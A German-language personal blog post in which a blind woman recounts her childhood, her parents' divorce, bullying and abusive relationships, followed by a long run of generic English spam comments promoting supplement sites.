prolog (german)

1. Deutsch
2. English
3. polski
4. cesky

1. Deutsch
2. English
3. polski
4. cesky

1.
Hallo, ich bin Anna, zur Zeit 27 Jahre alt und Blind. Trotz meiner 27 Jahre habe ich schon sehr viel erlebt, teilweise Dinge, die ich keinem auf der Welt wünsche, da sie so schrecklich sind, dass man sich ernsthaft fragt, wie ich diese Dinge überleben oder über sie hinwegkommen konnte. Fakt ist, ich habe es weitestgehend geschafft. Ich weiß genau, wie es sich anfühlt in ein tiefes Loch zu fallen und zu denken, da komme ich nie wieder heraus

Ich zähle zu den Geburtsblinden. das heißt, ich konnte noch nie sehen und werde es voraussichtlih auch nie können. Es gäbe eventuell die Möglichkeit einer neurologischen operation, aber ganz ehrlich, ich muss nicht sehen können. Ich komme zurecht, auch wenn es manchmal schwer ist. Als ich klein war, gehörten wir den Zeugen Jehovas an. Doch als ich 7 Jahre alt war, geschah etwas, woran ich mich erinnere, als wäre es gestern erst passiert:
Eine einschlägige Szene, die wohl jedes Kind kennt. Gerade sind die Hausaufgaben fertig, das Abendessen steht auf dem Tisch. Es gab Fleischspieße.
Mama: "Mausi, ich muss dir etwas sagen"
ich hatte schon eine dunkle Vorahnung.
Mama: "Papa und ich lassen uns scheiden"
Peng!
Ich: Was?
Ich wusste bereits was es bedeutete, wenn Eltern sich scheiden ließen. Den weiteren Verlauf des Gespräches habe ich nur noch verschwommen und fetzenweise in erinnerung. Das übliche Blabla, von wegen mama und papa haben dich trotzdem lieb, du hast keine Schuld und so weiter. Papa hatte sich also neu verliebt. Papa war also oft nicht daheim. Papa kam eh spät von der arbeit. ich sah ihn oft gar nicht oder erst später, oder erst am nächsten Tag. Von nun an sollte Papa für mich ganz und gar rar werden. Von da an schlief papa im Wohnzimmer und immer wenn ich nach unten kam, um mich anzuziehen, lag papa auf dem Sofa und schlief.
Mama hatte auch einen neuen Freund. Für ihn wollte sie, denn mama war auch ziemlich mollig, wie ich es bin, , sogar für ihn abnehmen und hat abends nichts mehr gegessen. Ich kannte ihren neuen freund kaum. Da er gitarre spielte und für mama seine Lieder spielte, zeigte ich ihm, was ich mit meinen 8 Jahren mir selbst auf dem Keyboard beigebracht hatte. Er hieß marko und lobte mein spiel. Doch das hielt nicht lange an.
Mama hatte noch zwei typen kennen gelernt, einen david und einen Axel. Axel lernte ich später kennen und er wurde, soviel kann ich verraten, mein Stiefvater. Er liebte mich so wie seine eigene Tochter. Wenn sie sich mit ihm traf, dann ging ich für den abend zu einer Familie der Zeugen Jehovas. Meistens war Versammlung, so nennen sie ihre gottesdienste. Die Familie hatte drei Kinder und ich verstand mich gut mit den beiden älteren Mädchen, Miriam und Eva. Die kleinste hieß Klara. Dass ich das noch weiß, nach all den Jahrn…
Eines Tages im Sommer holte mich mama abends von dieser Familie ab. Wir hatten, und das weiß ich noch, mit Straßenkreide den hof vollgekrakelt und sahen aus wie die Schweine. Waschen, und dann abendessen. Haferflocken mit Milch und kakao… Selbst das weiß ich noch. Abends kam ich mit Mama heim und Axel war da. Er gab mir die Hand und ich war total schüchtern. dieser fremde Mann, was wollte der hier. Das ist nicht mein Papa. aber nett war er.
Der Nächste Tag hielt eine mordsüberraschung für mich bereit. Wenn ich abends vor dem Schlafen meine Kassette gehört habe, musste ich immer Mamas alten walkman nehmen. und es ärgerte mich immer, dass ich oben keinen cd-spieler hatte. Als ich also am nächsten Tag aufwachte, ging ich runter in mein Spielzimmer. Dazu muss ich sagen, ich hatte damals zwei zimmer. ein schlafzimmer, das war oben, und ein spielzimmer. Da stand auch mein Schreibtisch. Ich ging also runter ins spielzimmer um wie üblich kassette zu hören und lego zu spielen oder barbie. Manchmal spielte ich auch keyboard. Als ich durch min zimmer ging, donnerte ich gegen etwas, das vorher noch nicht da stand. Ich tastete nach unten. Hä? Ich erkannte zwei boxen, die auf dem Boden lagen und … eine Stereoanlage? Das war aber nicht meine. oder doch? Auch axel zeigte ich meine musikalischen fähigkeiten. und dann fragte ich ihn, was das ding in meinem Zimmer unten war, doch ich musste eigentlich gar nicht fragen, denn er kam auf mich zu und erklärte mir, es wäre seine alte Stereoanlage und die wäre jetzt meine, damit ich oben nicht immer mamas alten walkman nutzen musste. Ich war so glücklich, denn bei dem walkman gingen die batterien irgendwann leer, und alles klang nicht mehr gut. Papa erklärte mir alle knöpfe und tasten, und ich nahm alles auf wie ein Schwamm das Wasser.
danach fuhren wir irgendwo hin. Axel hatte einen Fiat, mit dem fuhren wir. Ich weiß nicht mehr wohin es ging. ich weiß nur, dass die anlage super toll war, und ich endlich sogar einen Mikrofonanschluss hatte, das hieß, ich konnte meine Stimme aufnehmen. Einige wochen später machten wir einen sogenannten Ann-kathrin-tag. Also ein Tag allein für mich. Papa war da, mama auch und axel. Wir gingen auf den Rummelplatz und ich durfte mit papa karusellfahren. Geschenke bekam ich auch. ein krankenhausset für barbies, eine Krankenschwester und einen chirurg als barbiepuppen. von Papa und mama bekam ich je ein mikrofon. und auch eine leerkassette. Wir haben einige zeit zuvor Axel besucht und waren fast in der Schweiz, wo er ja herkam. die fahrt war lang und beschwerlich. unterwegs machten wir halt am bodensee und gingen ein eis essen und spazieren. Es war spät abends als wir am ziel ankamen. Wir machten allerlei ausflüge, gingen rollerbladen und in ein großes spielwarengeschäft, dort entdeckte ich einen süßen stofflöwen mit spieluhr der mir sehr gefiel, aber mama sagte nein. ich durfte den löwen nicht haben. An meinem Ann-Kathrin-tag, da bekam ich den löwen von Axel.

Man versuchte mich, so gut es ging, über den Verlust des Vaters und die Trennung hinwegzutrösten. Ich zeigte es meiner Mutter nicht, aber ich hatte anfangs schwierigkeiten, Axel zu akzeptieren. Immer wieder fragte sie mich, magst du ihn, würdest du ihn als neuen vater akzeptieren? Ich war den tränen nahe. einerseits ja, sehr, ich mochte ihn und fand ihn nett, andererseits wünschte ich ihn dorthin wo der pfeffer wächst. Ich wollte meinen Papa zurück, meine Familie. aber das konnte ich vergessen. Papa wollte mich ein jahr lang nicht sehen. immer war es mama die ihn dazu brachte, mich für eine zeit zu sich zu nehmen.
Die Jahre vergingen, ich wurde älter und bekam sogar noch eine kleine schwester. Ayleena. Mein vater richtete mich zugrunde. Er warf meiner Mutter vor, dass sie mir nicht genügend fürs leben beibrachte und profezeite mir, dass ich niemals allein leben können würde. Also versuchte er, je älter ich wurde, immer mehr und mehr durch drill an den Wochenenden mir das einzutrichtern was seiner meinung nach wichtig war. Ferien, das war ein Wort vor dem ich mich fürchtete. Denn in den Ferien musste ich für mindestens eine Woche zu papa. Und es war keine Zeit auf die ich mich freute. Ich musste mit 12-13 Jahren Kochen, putzen waschen. Ich erinnere mich noch gut daran, als er mich im Gästezimmer einfach mit dem unbezogenen Schlafsofa, dem unbezogenen Kissen und der unbezogenen Decke allein ließ. Normalerweise bereitete er mir immer das Bett vor. Ich wollte abgeholt werden. Dazu muss man sagen, papa hatte damals eine neue Freundin. jetzt ist sie seine Frau. Sie heißt Monika, und seither hat der Name Monika immer so einen schlechten beigeschmack. Liebe Monikas hier in der Community, bitte bitte nehmt es mir nicht übel. Ich kenne euch nicht und habe nichts gegen euch, aber wenn ihr diese Monika kennen würdet, oh mein gott… Sie hatte sich versucht bei mir einzuschleimen. hat mit mir kuchen gebacken und gekocht. aber dann fingen die zwei an, meine mutter vor mir schlecht zu machen. Und das beruhte auf Gegenseitigkeit. Jedes Elternteil machte das Andere vor mir schlecht. Und ich war erst 12! oder 13! Je älter ich wurde, desto schlimmer wurde es. Ich kam von meinem Vater heim und war eigentlich nur frustriert. Am Sonntag zählte ich die Stunden bis mich mein Vater heimfuhr. Längst war Axel für mich Papa. und mein Vater, er heißt klaus, war für mich nur klaus oder papa klaus, oder wie mittlerweile einfach nur mein erzeuger.
Ich flüchtete mich immer mehr in meine eigene Welt, Die Welt der Musik.Viele sagten mir damals nach, ich wäre zurückgeblieben, entwicklungsverzögert, andere sahen meine Begabung und sagten ich wäre hochintelligent, gescheit und hätte was im kopf.
mit 16 versuchten wir es mit dem gymnasium. Mein Erzeuger war schon immer dafür dass ich ins internat komme. er dachte ja immer, ich wäre nicht selbständig und mama wäre nicht fähig, mir das alles beizubringen. Ich habe mama immer vresucht in Schutz zu nehmen. Mir wollte es aber immer weniger gelingen. Ich blieb 3 Jahre in Marburg und dadurch, dass die naturwissenschaften meine problemfächer waren musste ich die 10. Klasse wiederholen und hätte auch die 11. klasse wiederholen müssen, das durfte ich aber nicht mehr. die ausbildung die ich hätte machen wollen, gab es nicht mehr. Meine Tage in Marburg waren also gezählt. Ich musste mich um eine Ausbildung kümmern und entschied mich für chemnitz in Sachsen. dort gab es ein berufsbildungswerk. ich wollte eigentlich etwas mit slawistik machen, denn mittlerweile interessierte ich mich für russland. Denn meine erste große Liebe im Gymnasium war ein Ukrainer, wegen dem man mich mobbte. die ganze klasse hasste mich, ich war eine außenseiterin. ich interessierte mich wenig für den schulstoff und diese freundin des jungen, vitali hieß er, und sie hieß katja, ich konnte sie nicht leiden. wenn sie wüsste, dass er mir immer noch verfallen zu sein schien. wobei er doch keine dicken mädchen mochte. ich war immer schon ein dickes mädchen. Deshalb wurde ich oft gehänselt und ausgegrenzt. Dass ich nicht in die Magersucht verfallen bin ist ein wunder. im gegenteil, als ich 18 war war ich noch einiges schlanker als ich jetzt bin. Aber ich habe gelernt, dass das Aussehen keineswegs alles ist. Das war auch früher schon mein Standpunkt. Wichtig ist, was in dir ist. ob du grips hast, ob du charakter hast. Schaut sie euch doch an diese barbies. klar gibt es auch nette barbies mit charakter, aber die meisten sind oberflächlich und leer.
In der Ausbildung lernte ich durch einen telefonchat einen Darek kennen. Er war pole. In ihn verliebte ich mich. Ich war bereits in chemnitz. Es fühlte sich seltsam an. Nach meiner arbeitserprobung, bei welcher ich relativ gut abschnitt aber als sehr selbstkritisch, oft unsicher galt und probleme hatte mich selbst einzuschätzen. Wir mussten einen Fragebogen ausfüllen, schnell fiel mein extremer perfektionismus auf und meine Angst erneut zu versagen. Diese angst zu versagen habe ich heute noch, allerdings nicht mehr so stark.
Ich erhielt damals die eignung für das dialogmarketing, was meine Mutter nicht gut hieß. "Die verbraten dich da nur. such dir was anderes, du hast deine talente woanders. warum gehst du nicht nach nürnberg, musikausbildung oder was mit sprachen, das liegt dir viel mehr" Doch mama und ich standen seit jahren auf kriegsfuß. Wir waren uns in einigen dingen zu gleich, in Anderen wieder waren wir zu verschieden.
Dass das oft knallte war vorprogrammiert. Auch mama fing an zu drillen. ich musste das bad rauswischen, das bad putzen die Waschbecken sauber machen und im Sommer oder wann immer es Mama beliebte einen Obstsalat machen, was ich davon hielt, zählte nicht. im Gegenteil wenn ich es nicht tatg worde ich bestraft. und als ich mal wieder eine reflektionsphase hatte und mir vornahm mich nicht mehr mit meinen Eltern zu zoffen, und mal freiwillig das bad putzte und einen obstsalat machte, erwartete ich eigentlich ein dankeschön. statt dessen nahm mama das für selbstverständlich und als ich ihr einen Wink mit dem Zaunpfahl gab, da wurde sie auch noch etwas säuerlich. "Es wäre eh deine pflicht gewesen" unterschwellig: "Wieso soll ich mich dafür bedanken für dinge, die eh deine aufgabe sind" anstelle dass sie stolz auf mich sind. Ich hatte von je her das gefühl, ich, die Blinde Tochter bin ihnen immer mehr nur ein klotz am Bein und sie sind froh, wenn ich weg bin. Ich wollte für mich sein, niemanden um mich rum. auch in der Ausbildung war ich ein einzelgänger. Mit Darek war nach 9 Monaten schluss. Nikolaj, den Freund den ich davor hatte, den habe ich in 3 jahren, die wir zusammen waren, nur 3 mal gesehen. Er war auch seltsam. so grob, so rauh, kam mit seiner Blindheit nicht klar. wollte immer soldat werden und verhielt sich immer wie ein russischer soldat. wollte immer marschieren. Darek hat mich nach 9 monaten dazu gebracht schluss zuu machen. sagte immer er wolle eine sehende, blonde und schlanke frau. ich bin alles nicht, ich bin blind, fett und braunhaarig. trotzdem war der kerl aber mehr als einmal mit mir im bett. Ich entdeckte meine liebe zu polen, der polnischen Musik und vor allem den polnischen Bergen. Ich interessierte mich für die polnische Kultur, hielt aber gleichzeitig an meinem Interesse zu Russland fest. Als 9-jährige habe ich bereits irische Musik gespielt und mich zog es schon immer in die ferne. mit 13 bin ich aufgetreten in irish pubs. wohl eher mit 14-15. Ich war damals in meinen Erzieher verliebt, das war so die erste zeit in welcher ich mir meiner sexualität bewusst wurde. doch ich sprach mit niemandem darüber, nur mit meiner besten Freundin. Nicht mal mit meiner mutter sprach ich darüber. Irische Musik gefiel meinem erzeuger nicht und er begleitete mich nur wiederwillig zu auftritten. verglich mich immer mit anderen, die seiner meinung nach besser waren als ich, weil sie die masse mitnahmen. wie die eine, die ein gospel gesungen hatte. und ich nur so ein "langweiliges, irisches weihnachtslied" doch er hat nicht gemerkt, dass das publikum muxmäuschenstill war und man hätte eine stecknadel fallen hören, und dass hinterher leute auf Annette, meine Gesangslehrerin zugegangen sind und ihr erzählten, "Das blinde Mädchen mit dem irischen Weihnachtslied, oh mein gott mir kamen die tränen!" Das, war mein erfolg, den mir mein Erzeuger nicht gönnte, und wenn ich heute darüber schreibe und darüber nachdenke, treibt es mir die Träne in die Augen.
Zurück aber nach chemnitz und zu daniel. Daniel kannte ich schon ewig. Er wollte mal was von mir aber … ich nicht von ihm. ich fand ihn süß, habe mich als ich mit Darek zusammen war mehr mit ihm beschäftigt, habe neue polnische Freunde gefunden. doch am 13.08.2012 kamen daniel und ich dann doch zusammen. es war mamas geburtstag. Daniel hatte mich allerdings mit meiner besten Freundin eifersüchtig gemacht und mich so dazu gedrängt mit ihm etwas anzufangen obwohl ich über darek noch nicht hinweg war. Ich besuchte Daniel oft in Berlin und fand dass berlin meine neue Heimat war. Ich mochte diesen typischen Berlin-Geruch, das typische Berliner Chaos sagte mir zu. Als mensch, der meistens ländlich wohnte und nicht selbständig werden konnte, denn meine Eltern leben in einem kaff, wo es keine vernünftige Busanbindung gibt. Da hätte ich niemals selbständig werden können. Daniel und ich waren also zusammen und seinem vater gefiel das gar nicht. er fand ich passe nicht zu ihm. seine mutter mochte mich aber. Wir konnten uns nur sehen, wenn seine eltern nicht da waren oder wenn wir zu einem freund ausweichen konnten. später trafen wir uns in einem hotel. Ich tat alles mögliche für ihn. aber leider waren die bedingungen unter welchen wir zusammen kamen nicht die idealen. und es war klar, dass diese Beziehung über kurz oder lang zum Scheitern verurteilt war. Sie hielt fast 4 Jahre.
Zwischenzeitlich war ich für 3 Monate mit einem Mann zusammen, der mein Leben zerstörte. Dieser Mann war kasache und ich kam dem wunsch meiner Mutter nach und suchte mir jemand sehendes, denn meine Mutter wünschte sich damals einen sehenden Mann für mich. Sie gab mir auch unterschwellig zu verstehen dass ich so wie ich war nicht anziehend für männer war. doch wenn meine mutter wüsste, wie viele Männer ich allein mit meiner stimme verzaubert hatte, ich glaube sie hätte anders gedacht. Dieser sehende mann, er war anfangs lieb und nett, hatte mir dann aber innerhalb von 3 monaten 4000 Euro vom konto geklaut, mein ipad, mien iphone, meine querflöte, mein akkordeon und mein Keyboard. dazu auch noch meine kleine münzsammlung geklaut. Meine Querflöte und ein alter windowsrechner waren auch ganz plötzlich weg. ich hatte in meiner eigenen Wohnung nichts mehr zu sagen. In meiner Wohnung gingen irgendwelche Leute, russen natürlich, ein und aus. einem vertraute ich mich an, aber das war ein fehler… ich habe einen wortfetzen mitbekommen. "Warst du heute nett zu ihr? Du hast natürlich nur so getan" das hat mich tief verletzt. anfangs sagte er ich wäre schön so wie ich war. dann wollte er auch unbedingt dass ich abnehme. er gab mir an allem die shuld, schlug mich oder schrie mich an für jeden fehler den ich machte.
Eines tages, ich kam von der arbeit, zwang er mich das bad zu putzen. ich kam mittlerweile nur noch mit angst nach hause. ich wollte nichts essen, er zerrte mich in die küche, meinte ich esse wie ein schwein, ich versuchte mit ihm zu reden. er sah auch sehr wohl dass ich handelte wie ein roboter, weil er es so wollte. ich traute mich nichts mehr. weder machte ich musik noch etwas anderes, ich las in meinem russischwörterbuch um mein russisch zu verbessern. er war ja der meinung ich könne es nicht gut genug. aber ich verstand gut genug russisch um seine drohungen und agressiven ausführungen über mich zu verstehen. Er sagte Dinge wie:
"Wenn ich will kann ich dich töten. Dein Fleisch gebe ich den Hunden zum Fraß, den Anderen sage ich du bist im Urlaub, dich findndet niemand"
Das machte mir angst. letztendlich war es mein damaliger Chef, in dessen Firma ich nach der Ausbildung angefangen habe, als ich mich seit dem Praktikum bewehrt hatte, der mich aus den fängen dieses brutalen kriminellen befreite. Ich war eine Woche im Frauenhaus. hatte nichts mehr, kein geld um mir essen zu kaufen, hatte mietschulden, hätte fast meine Wohnung verloren, für die ich so gekämpft hatte. ich wollte heim. ich vermisste daniel. der konnte wenigstens akzeptieren wenn ich abends müde von der arbeit heim kam. Sergej dagegen sagte nur: "Du kannst nichst, du bist nichts. Du bist zu nichts anderem fähig als fressen, schlafen und scheißen" Aha! und wer bringt dann das Geld nach hause, dass du mit vollen händen ausgibst, herr Michaelis? das dachte ich, aber das sagte ich nicht. ich hatte zu große angst etwas zu sagen. In russland tut die Frau was der Mann will, größtenteils in osteuropa. ich wollte eine osteuropäerin sein, also musste ich mich dem fügen. Aber muss ich mich als frau eines osteuropäers denn schlagen und mit füßen treten lassen? ganz sicher nicht, denn ich kenne andere beispiele von osteuropäischen familien, da ist der Mann vielleicht der chef, und die Frau unterwürfig, aber es wird niemand geschlagen. und, entscheidet man nicht sachen gemeinsam?

ich kehrte nach der sache mit sergej heulend zu daniel zurück und erzählte ihm alles. danach waren wir nochmal zusammen aber es half nichts. ich muss sagen, dass ich leider auch einmal nicht treu war. als ich merkte dass ich einen adern liebte habe ich mit daniel schluss gemacht, es hat nichts geholfen. wir waren zu verschieden. Adam, mein folgender partner war mir untreu. durch ihn lernte ich allerdings robert kennen, mit dem ich zusammen war, und zwar für ein jahr. Er hatte allerdings starke probleme, kam mit sich selbst nicht klar, wollte sich umbringen oder dachte daran. er war Zigeuner, trank sehr viel, war aber durchaus ein netter kerl. war aber der meinung ich würde ihm zu viel meckern. dabei meckerte ich nicht. Es gab auch situationen da war ich richtig sauer. wir haben uns gestritten, fast immer.
danach lernte ich über eine whatsappgruppe einen kerl namens marcin kennen. der erzählte mir, wie schlecht ihm das leben mitgespielt hatte. ich bin immer sehr hilfsbereit und wollte ihm nur helfen. er erklärte mir dass ich alkoholismus nicht akzeptieren müsse, dass ich robert vor die wahl stellen sollte. marcin blieb beim mir. ich hatte ihn aufgenommen, er klaute mir zwar kein geld und keine sachen, bis auf einen koffer … aber er nutzte meine hilfsbereitschaft und gutmütigkeit eiskalt aus. außerdem schrie er mich oft an, knallte mit den türen und war oft agressiv. das tat seiner Gesundheit, die eh schon wohl sehr angeschlagen war nicht gut. er fühlte sich schlechter, machte mir vorwürfe, ich hatte meine arbeit im damaligen unternehmen längst verloren, hatte 7 monate später eine neue arbeit und die ein halbes jahr später im rahmen der probezeit auch verloren, seither war ich 3 jahre arbeitslos. in diesen 3 jahren ist sehr viel passiert. Als ich noch mit robert zusammen war, habe ich die Zusage für einen job gekommen, bei dem ich jetzt mit erfolg arbeite. Die Probezeit habe ich überstanden und ich bin richtig glücklich. Ich arbeite nun für eine Firma, die bioresonanzgeräte herstellt. Marcin war der meinung das wären alles betrüger und seine freundin würde da auch noch mitmachen. er war sauer, dass wir hier in deutshcland alles bekommen und in polen müssten sie selbst sich mit dem nötigsten zufrieden geben. Er war so undankbar, ich hatte ihm eine gitarre, einen laptop, neue schuhe, neue kleider gekauft, habe ihm mein nabelneues handy überlassen. nach 3 wochen waren wir sogar verlobt. ich wollte eigentlih noch warten. aber er fühlte sich zurückgewiesen. ich dachte man könne es versuchen.
zur damaligen zeit hatte ich auch noch katzen. die musste ich wegen meiner arbeit und dem schmutz den sie verursachten abgeben. ich hatte die wahl, wohnung weg, arbeit weg, katzen weg oder mehr hilfe. mit wohnung weg meinte ich, ich sollte mir eine andere wohnung suchen.
arbeit weg, nach 3 jahren suche kam nicht in die tüte. mehr hilfe, ok, aber wo bleibt da die selbständigkeit, ich will nicht noch mehr betreuung. dann schon lieber katzen weg, da gab es keine diskussion. die arbeit ging vor.ich arbeite schließlich von zuhause aus. Da Marcin kein gutes haar an meiner arbeit ließ und ich mich selbst ordnen musste, habe ich ihn nach polen zurück geschickt. er solle sich auskurieren denn er fühlte sich immer schlechter aber der arzt konnte nichts feststellen, und ich wollte mein leben erst einmal sortieren. Marcin war so eifersüchtig, er witterte in jedem mann mit dem ich zu tun hatte, einen konkurrenten. er machte mich auch eifersüchtig, indem er nachrichten an eine andere frau schrieb, sehr eindeutige nachrichten. die er natürlich anschließend löschte. "und du glaubst, es ist ok, wenn du dauernd an tschechen denkst? Gib zu, du hast was mit deinem tschechischen schulfreund da!" dabei waren wir nur freunde.er glaubte mir nicht. ich war zugegeben, heilfroh dass er weg war, konzentrierte mich auf das was jetzt wichtig war. auf die arbeit. Kaum in polen, meldete er sich nicht mehr. er fragte mich ein zwei mal nach geld, weil er angeblich nichts zu essen hatte. Er war ja so undankbar. ich hatte ihm als er noch hier war, eine gitarre gekauft. dafür hatte ich kein geld. ich hatte mich hoch verschuldet, war 500 euro im minus. er wollte noch eine, eine klassische, da hat die bank aber nein gesagt und ich habe zwar versprochen ich kaufe sie ihm, aber erst zahle ich meine rechnungen. leider musste ich feststellen, dass ich nur noch 500 euro hatte und etwas brauchten wir zum leben. deshalb habe ich gesagt dass es den monat nicht geht. anstatt verständnis erntete ich einen wutausbruch ohne gleichen. ich würde leute verarschen sagte man mir. rums, tür zu. ich wollte es wieder gut machen indem ich mit ihm zu unserem lieblingsgriechen gehe, aber das wollte er nicht. statt dessen hatte ich es, wie gesagt versucht. die gitarre ging nicht. statt dessen neue saiten für seine andere, die ich ihm zuvor gekauft hatte, neue plektren, einen kapudaster und ein kabel fürs keyboard damit wir zusammen spielen konnten. eine Sache kaufte ich mir, ein mikrofon für 19 euro. und deshalb regte er sich auf. "ja ja, hauptsache du hast dein Mikrofon. Für deine sachen hast du geld aber für meine nicht. Ich habe es ja immer gesagt, trau bloß keiner Frau, sie führt dich ja doch nur hinters licht. Hallo! Wer war es denn der dir alles das gegeben hat was du wolltest, und du wolltest nur das beste vom besten. wer war denn immer für dich da auch wenn du das gegenteil behauptest? wer hat dir denn einen laptop organisiert damit du arbeit suchen kannst? beziehungsweise wo du was in aussicht hattest? Dass du die stelle nicht bekommen hast, ist nicht meine schuld. und nur weil man zwei schräubchen rausdrehen muss, damit man den akku wechseln kann, nur deswegen sagst du das teil wäre ramsch? nur weil wir es aus dem sozialwarenladen gekauft haben? ist es deshalb schlechter? Du undankbarer kerl! und nebenher, das wusste ich allerdings erst viel später durch einen Kumpel, hatte er noch eine andere!und das geld, das ging für diese tussi drauf.

ich war so unglücklich, dass ich am Sonntag den vierten november 2018 in die kirche ging und betete, dass gott mir endlich den mann zeigt, der wirklich bei mir bleibt und mich wirklich liebt, niht nur für das geld das ich verdiene oder die hilfen die ich ihm zu teil werden lasse, oder weil ich im ach so reichen deutschland lebe. Einen tag später lerne ich meinen Freund kennen. und es geht steil aufwärts, doch dazu in einem Anderen beitrag mehr. Zuvor möchte ich noch sagen, dass nach der sache mit sergej, meine mutter schwer krank wurde. sie bekam krebs und starb im jahr 2015 im november. im Jahr 2016 habe ich meinen zuweiten job verloren und im jahr 2018 habe ich meinen neuen job durch eine maßnahme bekommen. es ist eine große chance die ich ergriffen habe, und ich war sehr, sehr skeptisch.
aber jetzt wird alles gut, ich weiß es.

19,014 replies on “prolog (german)”

Hi, I do think this is a great blog. I stumbledupon it 😉 I am going to come back once again since i have book marked it.
Money and freedom is the greatest way to change, may you be rich
and continue to help other people.

Also visit my web site :: ViagRx

Its like you read my mind! You appear to know so much about this, like you wrote the book in it
or something. I think that you can do with a few
pics to drive the message home a bit, but instead of that, this is magnificent blog.
A fantastic read. I’ll certainly be back.

I’ve been exploring for a little bit for any high-quality articles or blog posts on this kind of
house . Exploring in Yahoo I at last stumbled upon this web
site. Studying this information So i am glad to convey that I’ve
a very excellent uncanny feeling I found out just what I needed.
I so much for sure will make sure to do not overlook this
website and provides it a glance regularly.

Feel free to surf to my web site: Xoth Keto BHB Review

I’m really loving the theme/design of your site. Do you ever run into any web browser compatibility
issues? A small number of my blog visitors have complained about my blog not operating correctly in Explorer but looks great in Opera.
Do you have any suggestions to help fix this problem?

My blog post :: Body Core Keto Review

Hi there! Quick question that’s entirely off topic.
Do you know how to make your site mobile friendly? My site looks
weird when viewing from my apple iphone. I’m trying to find a template or plugin that might be able to resolve this
issue. If you have any recommendations, please share.
Thanks!

Excellent blog here! Also your website a lot up very fast! What web host are you the use of?
Can I get your affiliate hyperlink on your host?
I want my website loaded up as quickly as yours lol

I have to thank you for the efforts you have put in writing this website.
I am hoping to view the same high-grade blog posts from you in the future as well.
In truth, your creative writing abilities has motivated me
to get my own, personal website now 😉

It’s a pity you don’t have a donate button! I’d certainly donate to this excellent blog!

I guess for now i’ll settle for book-marking and adding your RSS feed to my Google account.

I look forward to fresh updates and will talk about this blog with
my Facebook group. Chat soon!

Today, I went to the beach with my kids. I found a
sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.”
She put the shell to her ear and screamed. There was a
hermit crab inside and it pinched her ear. She never wants to go back!
LoL I know this is completely off topic but I had to tell someone!

Having read this I thought it was very informative.
I appreciate you taking the time and energy to put this informative article together.
I once again find myself spending a lot of time
both reading and posting comments. But so what, it was still worth it!

Just desire to say your article is as surprising.
The clarity in your post is just cool and i can assume you’re
an expert on this subject. Fine with your permission allow me to grab your feed
to keep updated with forthcoming post. Thanks a million and please continue the enjoyable
work.

This design is steller! You definitely know how to keep a reader amused.
Between your wit and your videos, I was almost moved to start my own blog
(well, almost…HaHa!) Great job. I really enjoyed what you had to say, and more than that, how you presented it.

Too cool!

Hello there! This is my 1st comment here so I just wanted to give a quick shout out and say I really
enjoy reading your posts. Can you recommend any other blogs/websites/forums that cover the same subjects?
Many thanks!

May I simply say what a comfort to find somebody that genuinely understands what they’re discussing over the internet.

You actually know how to bring a problem to light and make it important.

More and more people need to look at this and understand
this side of your story. I was surprised that you aren’t more popular because you most certainly possess the gift.

It is perfect time to make some plans for the future and
it is time to be happy. I’ve read this publish and if I could I wish to counsel you few fascinating issues or suggestions.
Maybe you could write subsequent articles referring to this
article. I desire to read even more issues approximately it!

I know this if off topic but I’m looking into starting
my own weblog and was wondering what all is required to get setup?
I’m assuming having a blog like yours would cost a
pretty penny? I’m not very internet savvy so I’m not 100% certain. Any suggestions or advice would be greatly appreciated.
Cheers

Thanks on your marvelous posting! I really enjoyed reading it,
you could be a great author.I will be sure to bookmark
your blog and will come back in the foreseeable future. I want
to encourage you to definitely continue your great posts, have
a nice evening!

It’s perfect time to make some plans for the longer term and it
is time to be happy. I have learn this post and if I may I want to suggest you some attention-grabbing
things or tips. Maybe you could write subsequent articles referring to this article.
I wish to read even more things about it!

Can I simply say what a relief to find somebody who genuinely knows what they are talking about online.
You definitely realize how to bring an issue to light and make it important.

A lot more people have to read this and understand this side of your story.

It’s surprising you are not more popular given that you certainly have the gift.

Here is my homepage – Green Naturals CBD Review

I’ve been surfing online more than 2 hours today,
yet I never found any interesting article like yours.
It’s pretty worth enough for me. In my view, if all site owners
and bloggers made good content as you did, the web will be a lot more
useful than ever before.

Hello just wanted to give you a brief heads up and let you know a few of the pictures aren’t loading properly.
I’m not sure why but I think its a linking issue. I’ve tried it in two different web browsers and both show the same results.

We’re a group of volunteers and starting a brand new scheme in our
community. Your site provided us with useful info to work
on. You have done a formidable task and our entire neighborhood can be thankful to you.

What i don’t realize is in truth how you’re now not really a lot more well-liked than you may be now.

You are so intelligent. You understand thus considerably with regards to this
matter, produced me personally imagine it from a lot of various
angles. Its like women and men aren’t fascinated until it is one thing to accomplish with Woman gaga!

Your own stuffs outstanding. At all times maintain it up!

I believe that is among the most significant info for me.
And i’m happy reading your article. However wanna statement on few common issues,
The web site taste is perfect, the articles is in point of fact
excellent : D. Just right task, cheers

Superb blog! Do you have any helpful hints for aspiring writers?
I’m planning to start my own site soon but I’m
a little lost on everything. Would you recommend starting with
a free platform like WordPress or go for a paid option? There are so many options out there that I’m totally
overwhelmed .. Any ideas? Kudos!

Hi there! I know this is kinda off topic but I was wondering which blog platform
are you using for this site? I’m getting sick and tired
of WordPress because I’ve had problems with hackers and I’m looking
at alternatives for another platform. I would be fantastic
if you could point me in the direction of a good
platform.

Does your blog have a contact page? I’m having problems locating it
but, I’d like to shoot you an email. I’ve got some
creative ideas for your blog you might be interested
in hearing. Either way, great website and I look forward to seeing it grow over time.

I was curious if you ever considered changing the page layout of your website?
Its very well written; I love what youve got to say.
But maybe you could a little more in the way of content so people could connect with it better.

Youve got an awful lot of text for only having one
or two images. Maybe you could space it out better?

Good – I should certainly pronounce, impressed with your site.
I had no trouble navigating through all the tabs as well as related
info ended up being truly easy to do to access. I recently found what I hoped for before you know it at
all. Reasonably unusual. Is likely to appreciate it for
those who add forums or something, website theme .

a tones way for your customer to communicate. Nice task.

Also visit my website … Ardent Male Enhancement Review

Good day! I know this is kinda off topic but I
was wondering if you knew where I could get a captcha plugin for my comment form?
I’m using the same blog platform as yours and I’m having trouble
finding one? Thanks a lot!

Write more, thats all I have to say. Literally, it seems as though you relied on the video
to make your point. You clearly know what youre talking about, why throw away your intelligence on just posting videos
to your weblog when you could be giving us something
informative to read?

Its such as you learn my thoughts! You appear to know a lot about
this, such as you wrote the ebook in it or something.

I feel that you simply could do with some percent to
power the message house a bit, but other than that, that is excellent blog.
A great read. I’ll definitely be back.

My partner and I stumbled over here coming from
a different website and thought I may as well check things out.
I like what I see so now i’m following you. Look forward to exploring your web
page yet again.

Very great post. I simply stumbled upon your weblog and wished to mention that I’ve truly loved browsing your weblog posts.
